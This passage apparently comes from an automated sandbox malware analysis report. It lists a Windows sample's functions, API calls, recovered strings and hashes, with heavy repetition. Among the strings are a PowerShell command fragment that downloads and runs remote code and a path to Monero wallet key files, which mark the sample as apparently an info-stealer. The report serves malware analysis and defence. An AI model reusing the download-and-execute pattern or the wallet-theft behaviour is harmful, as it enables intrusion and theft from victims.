                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 49ebdd001904660f343a289e51aec73dfeb067b364ecd035092b68485aaffc1c
                              • Instruction ID: 23ee29a439452deddc37fc8a18274267333eacef90fbeab7e898fec627fc0b71
                              • Opcode Fuzzy Hash: 49ebdd001904660f343a289e51aec73dfeb067b364ecd035092b68485aaffc1c
                              • Instruction Fuzzy Hash: 363127B4A00209EFDB14CFA4C989FAE77B5FF58300F108158E902A7290D778EA51CFA1
                              Function 001D4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,014AE5D8), ref: 001D47DB
                                • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4801
                              • lstrcat.KERNEL32(?,?), ref: 001D4820
                              • lstrcat.KERNEL32(?,?), ref: 001D4834
                              • lstrcat.KERNEL32(?,0149B7E8), ref: 001D4847
                              • lstrcat.KERNEL32(?,?), ref: 001D485B
                              • lstrcat.KERNEL32(?,014ADC40), ref: 001D486F
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001D8D90: GetFileAttributesA.KERNEL32(00000000,?,001C1B54,?,?,001E564C,?,?,001E0E1F), ref: 001D8D9F
                                • Part of subcall function 001D4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001D4580
                                • Part of subcall function 001D4570: RtlAllocateHeap.NTDLL(00000000), ref: 001D4587
                                • Part of subcall function 001D4570: wsprintfA.USER32 ref: 001D45A6
                                • Part of subcall function 001D4570: FindFirstFileA.KERNEL32(?,?), ref: 001D45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 39441d077660da5f5ead80a07f104a0802569cf020adc6eb4ae92ace270dd8c6
                              • Instruction ID: d86644bf480a9504559304edaf4c58deb2fb066a0193b420dae22adb1aee1610
                              • Opcode Fuzzy Hash: 39441d077660da5f5ead80a07f104a0802569cf020adc6eb4ae92ace270dd8c6
                              • Instruction Fuzzy Hash: 4831A2B6900308A7CB14FBB0DC85EED737CAB68300F40459AB359A6181EF70D789CB96
                              Function 001D2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001D2D85
                              Strings
                              • <, xrefs: 001D2D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 001D2D04
                              • ')", xrefs: 001D2CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 001D2CC4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 28fb27328af6f5e1452f2cd63c2490b6dda03466b7ff163bf253588700af7174
                              • Instruction ID: f14373497f0ed7b2045fe34b72baa4f0a503aa8e4b807507772bb5e7e50ce7b3
                              • Opcode Fuzzy Hash: 28fb27328af6f5e1452f2cd63c2490b6dda03466b7ff163bf253588700af7174
                              • Instruction Fuzzy Hash: 26410271C502589ADB18FFA0C892BEDB774AF24300F80412AF416B7291EF742A4ADF95
                              Function 001C9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001C9F41
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 66c544b3845d146ff95b2a0667a3f1de57415b61083d65051f8e98c92eb1e51b
                              • Instruction ID: 6d3b3b449b38ffccb817a7806756c23f01393228ada14b21ed4cd311a7345752
                              • Opcode Fuzzy Hash: 66c544b3845d146ff95b2a0667a3f1de57415b61083d65051f8e98c92eb1e51b
                              • Instruction Fuzzy Hash: 47616170A5024CEBDB14EFA4CC96FED7775AF65344F408018F90A5F281DBB0AA45CB52
                              Function 001D40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,014ADDA0,00000000,00020119,?), ref: 001D40F4
                              • RegQueryValueExA.ADVAPI32(?,014AE5A8,00000000,00000000,00000000,000000FF), ref: 001D4118
                              • RegCloseKey.ADVAPI32(?), ref: 001D4122
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4147
                              • lstrcat.KERNEL32(?,014AE5C0), ref: 001D415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: d876b71550b92e9a3e21035f74021eb3e9de8e134b2bc3bfd7579abeb3e86f61
                              • Instruction ID: 325f48c3e0056e064c22550a0f46972eff33ec618103a0b55e09fef13b94d8c1
                              • Opcode Fuzzy Hash: d876b71550b92e9a3e21035f74021eb3e9de8e134b2bc3bfd7579abeb3e86f61
                              • Instruction Fuzzy Hash: B241C8B6D002086BDB14FBA0DD46FFE733DAB99300F00855DB61657181EB759B988BD2
                              Function 001D7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0149C278,00000000,00020119,?), ref: 001D7E5E
                              • RegQueryValueExA.ADVAPI32(?,014ADB40,00000000,00000000,000000FF,000000FF), ref: 001D7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 001D7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ef284aff2d569c0a7ad51919b3e232aba413d52306dbd0c4d037f8b9e751b40b
                              • Instruction ID: 4bc10193eca4f233887b4dac9e5cb9ab0a3ef1d14299b8f3812daaaa613f79e0
                              • Opcode Fuzzy Hash: ef284aff2d569c0a7ad51919b3e232aba413d52306dbd0c4d037f8b9e751b40b
                              • Instruction Fuzzy Hash: DA1151B2A44305EBD704DF94DE49F7FBBB8EB44710F10816AF605A7280D77458108BA1
                              Function 001D9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(014AE398,?,?,?,001D140C,?,014AE398,00000000), ref: 001D926C
                              • lstrcpyn.KERNEL32(0040AB88,014AE398,014AE398,?,001D140C,?,014AE398), ref: 001D9290
                              • lstrlen.KERNEL32(?,?,001D140C,?,014AE398), ref: 001D92A7
                              • wsprintfA.USER32 ref: 001D92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 0636a8665bae7fa4c9d1120187329a0f9c2c522becdce240a420428948bf6b2c
                              • Instruction ID: 17cf87003cb6de997d4fa22f5fbb02821d962f52197602027b91bd7d6d0bf984
                              • Opcode Fuzzy Hash: 0636a8665bae7fa4c9d1120187329a0f9c2c522becdce240a420428948bf6b2c
                              • Instruction Fuzzy Hash: E0010875500208FFCB04DFECC988EAE7BB9EB48350F108158F909AB240C775AA60DB96
                              Function 001C12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001C12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001C12F5
                              • RegCloseKey.ADVAPI32(?), ref: 001C12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ed30376f409ac10d664352fd2aee6b983602db6b78e3fbba452902a446c9ce0d
                              • Instruction ID: b9860bd818a87fb5ca3d4598247d5803f0042beabe27c9b7ad51fde18877dd64
                              • Opcode Fuzzy Hash: ed30376f409ac10d664352fd2aee6b983602db6b78e3fbba452902a446c9ce0d
                              • Instruction Fuzzy Hash: BC0131BAA40308BBDB00DFE0DD49FAEB7B8EB48701F108169FA05A7280D6709A158F55
                              Function 001DC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 9d518e2a77065daff2c73f022551877dbf1e5aa851b05917d00f21a01b83ba42
                              • Instruction ID: c52419770d1f9f8f9c2d8f5380c7ea1b3d5d9efb616007aa99f9c6f8b29728cd
                              • Opcode Fuzzy Hash: 9d518e2a77065daff2c73f022551877dbf1e5aa851b05917d00f21a01b83ba42
                              • Instruction Fuzzy Hash: 4A4127B150079D5EDB258B24CD94FFB7BEC9F05308F1848E9E98A86282D3719A44DFA0
                              Function 001D6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 001D6663
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001D6726
                              • ExitProcess.KERNEL32 ref: 001D6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 3a2dc46ea4de034623795cd3e13fcf3ee75a70a9e310438fd0a6209be461c4af
                              • Instruction ID: 56becbcbe0349c3f8e53dd0b736f0491d0f0dbe23b6be2fc08a24b066e3b2a03
                              • Opcode Fuzzy Hash: 3a2dc46ea4de034623795cd3e13fcf3ee75a70a9e310438fd0a6209be461c4af
                              • Instruction Fuzzy Hash: 05312FB1801218ABDB14EB50DD91FDE7778AF54300F80519AF20977291DF746B48CF5A
                              Function 001D87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001E0E28,00000000,?), ref: 001D882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D8836
                              • wsprintfA.USER32 ref: 001D8850
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
